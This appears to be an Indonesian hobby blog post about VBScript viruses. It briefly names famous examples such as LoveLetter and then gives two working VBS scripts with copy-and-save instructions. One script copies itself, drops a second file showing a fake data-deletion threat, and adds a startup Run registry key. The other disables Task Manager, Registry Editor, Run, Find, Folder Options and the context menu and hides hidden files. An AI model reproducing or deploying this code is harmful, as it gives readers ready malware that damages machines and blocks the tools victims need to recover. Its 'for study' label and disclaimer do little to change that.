Tentang Virus VBS

Akhir" ni ane agak terobsesi ma yang namanya virus. jadi pengen bahas virus nih, setahu ane, virus paling sederhana tu ya virus vbscript? apa ya virus vbscript tu?

setau ane vbscript tuh virus yang:

berupa file berakhiran [dot]vbs

dibuat dengan bahasa BASIC

standarnya, dijalankan oleh wscript.exe di sistem berbasis windows

virus yang 'menggantikan' virus BAT, file dengan ekstensi [dot]bat. yaitu virus dengan orientasi batch. berarti pengerjaan instruksi program secara batch (satu-satu) tidak ada yang prosedural.

virus yang 'ngetrend' karena ulah Onel de Gusman (Philipina) membuat virus VBS/LoveLetter-nya atau virus I Love You

Makin 'ngetrend' lagi setelah virus maker-virus maker indonesia membuat virus VBS/Melissa, yang sempat menyebar luas. Dan juga virus VBS/Mella yang dideteksi oleh AntiVirus dengan nama palindromnya: "VBS/alleM"

setelah melihat ciri-ciri vbs diatas,

ane pengen menyampaikan sesuatu tentang "Apa itu Virus"

Istilah virus diadopsi dari istilah biologi. virus dalam biologi pasti tau...
dapat "berkembang biak" sendiri
dapat "menginfeksi" atau "menumpang" ke file lain dengan cara mengisi awal, tengah, atau akhir dari struktur file korban dengan bit-bit virus. masih ingat Kspool? atau beberapa AV menyebutnya BackDoor? virus tersebut "menumpang" pada file [dot]doc, dll
virus yang "baik" adalah virus yang dapat "membela diri". bisa saja dengan cara menyembunyikan file virus, sampai menutup Task Manager, Regedit, dsb...
Virus komputer itu LOGIC, dan hasil dari pikiran manusia yang tidak bertanggung jawab. virus bukan berbentuk "fisik" seperti virus Biologi. jadi jangan takut dengan komp yang terkena virus, apalagi sampai menggunakan masker segala , hehehehehehe :)

Ini ane berikan contoh script file vbs yg sederhana (UNTUK DIPELAJARI) jangan disalah gunakan ya?

copy semua script dibawah ini ke notepad. trus save dengan ekstensi *.vbs

set fso=createobject("scripting.filesystemobject")

'buat file system object peng-handle file

set reg=createobject("wscript.shell")

'reg sbg paramater untuk mengeksekusi script

set file=fso.getfile(wscript.scriptfullname)

'fso digunakan, untuk mengambil file .vbs yang di-klik

file.copy "D:\sincan.vbs"

'var file di-copy ke drive D. virus mulai nyebar =P

set nfile=fso.createtextfile("c:/kucing.vbs")

'fso digunakan lagi, untuk membuat file baru di C, bernama kucing.vbs

nfile.write "msgbox" &chr(100) &"Anda telah mengaktifkan virus dalam komputer ini, jangan panik atau setres, karena data anda akan segera dihapus :) " &chr(100)

'file kucing.vbs di tulisi script oleh file yang scriptnya sedang anda baca ini

reg.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\kucing","c:\kucing.vbs"

'menulis registry, agar file virus dieksekusi otomatis oleh windows saat startup

Ada yg bingung? pelajari dulu. nantinya, kalau sudah di-klik, akan ada file bernama kucing.vbs di drive C anda. Coba kucing.vbs di klik, maka akan muncul msgbox dengan pesan " Anda telah mengaktifkan virus dalam komputer ini, jangan panik atau setres, karena data anda akan segera dihapus :) ". message box itu akan selalu muncul ketika windows anda dijalankan. Coba anda bayangkan jika kucing.vbs berisi script yang memerintahkan komp anda untuk shutdown? maka komp anda akan shutdown selamanya ketika PC dijalankan :)

ini ada script lagi buat dipelajari:

On Error Resume Next

‘kode ini berfungsi untuk meneruskan ke kode berikutnya jika terjadi Error. Ini sering digunakan oleh para pembuat virus.

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr", "1", "REG_DWORD"

‘ berfungsi untuk mendisable "Registry Editor" dan "Task Manager"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoRun", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFind", "1", "REG_DWORD"

‘ Ini digunakan untuk menghilangkan menu "Folder Options", "Run", dan "Find"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

‘ Berfungsi untuk tidak menampilkan menu Klik Kanan.

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\Advanced\Hidden", "1", "REG_DWORD"

‘ Tidak menampilkan "File Hidden" pada "Explorer"

maka akan tercipta script seperti berikut ini:

On Error Resume Next

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoRun", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFind", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\Advanced\Hidden", "1", "REG_DWORD"

Kemudian simpan dengan jenis vbs (*.vbs)

Caranya: klik File, pilih Save As, pada File Name ketik "Virus.vbs" (tanpa tanda petik), kemudian klik Save.

Selesai. . .

*) SEGALA APA YANG TERJADI PADA KOMPUTER ANDA, ANDA SENDIRI YANG BERTANGGUNG JAWAB,….

Teori Maya

Pencarian

Tentang Virus VBS

Comments

Post a Comment